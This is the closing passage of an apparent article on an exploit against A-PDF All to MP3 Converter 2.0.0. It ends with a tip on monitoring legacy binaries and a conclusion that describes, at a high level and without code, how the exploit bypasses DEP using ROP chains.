- Monitor for exploits targeting legacy binaries using tools like Metasploit or IDA Pro for vulnerability analysis.
Conclusion
The A-PDF All to MP3 Converter 2.0.0 exploit is a textbook case of how DEP bypass techniques can be achieved through careful manipulation of Windows memory APIs. It underscores the importance of securing legacy software and understanding the risks associated with using unverified tools. For cybersecurity professionals, this exploit serves as a valuable case study in ROP chain construction, memory execution control, and defensive strategies against heap-based attacks.
As attackers continue to evolve, defenders must remain vigilant—especially in environments where outdated software remains in use.